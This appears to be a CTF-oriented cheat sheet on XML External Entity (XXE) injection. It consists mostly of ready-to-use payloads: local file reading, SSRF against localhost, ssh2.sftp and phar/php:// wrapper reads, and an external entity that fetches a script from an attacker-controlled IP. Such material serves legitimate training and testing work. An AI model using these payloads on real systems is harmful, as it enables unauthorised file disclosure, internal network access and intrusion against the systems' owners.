Headers:
To exploit an XXE Content-Type must be
text/xml
1
2
POST /action HTTP/1.0
Content-Type: text/xml
File Reading
While exploring an XXE it is important to use the tags provided by the application, in this scenario, the entity &xxe is being called as part of the tags from user:
1
2
3
4
5
6
7
8
9
10
11
12
13
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///ETSCTF" >]>
<creds>
<user>&xxe;</user>
<pass>mypass</pass>
</creds>
SSRF attacks
Sometimes a local IP address is in place so it is important to use the localhost IP address to get access to the internal resources on the victim machine:
1
2
3
4
5
6
7
8
9
10
11
12
13
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://127.0.0.1/2ndGrade/ETSCTF" >]>
<creds>
<user>&xxe;</user>
<pass>mypass</pass>
</creds>
SSH2.EXEC, SSH2.SHELL, SSH2.SFTP, SSH2.TUNNEL, SS2.SCP
There is a possibility that ssh is enabled as a wrapper while testing an XXE, for that reason is important to test such payloads that can retrieve files within the system:
1
2
3
4
5
6
7
8
9
10
11
12
13
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "ssh2.sftp://3rdgrader:3rdgrader@127.0.0.1/ETSCTF" >]>
<creds>
<user>&xxe;</user>
<pass>mypass</pass>
</creds>
PHAR
Use of phar allows to set an specific path to read the content:
1
2
3
4
5
6
7
8
9
10
11
12
13
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "phar://tmp/ETSCTF-10.10.1.250.tar/ETSCTF" >]>
<creds>
<user>&xxe;</user>
<pass>mypass</pass>
</creds>
Custom Wrappers
Sometimes we can identify that there are some custom wrappers within the XXE, a good idea is to do a fuzz with them in order to review if there is any:
Example 1:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "php://fd/375" >]>
<creds>
<user>&xxe;</user>
<pass>mypass</pass>
</creds>
1
2
3
4
5
6
7
8
9
10
11
12
13
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "php://temp" >]>
<creds>
<user>&xxe;</user>
<pass>mypass</pass>
</creds>
Examples: ECHO CTF elementary
External Entities
1
2
3
4
5
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://10.10.14.3/pwned.js" > ]>
<Heartbleed>
<Ping>&xxe;</Ping>
</Heartbleed>
Examples: Fulcrum
XXE Blind Out of Band
For further details read the XXE Blind Out of Band post.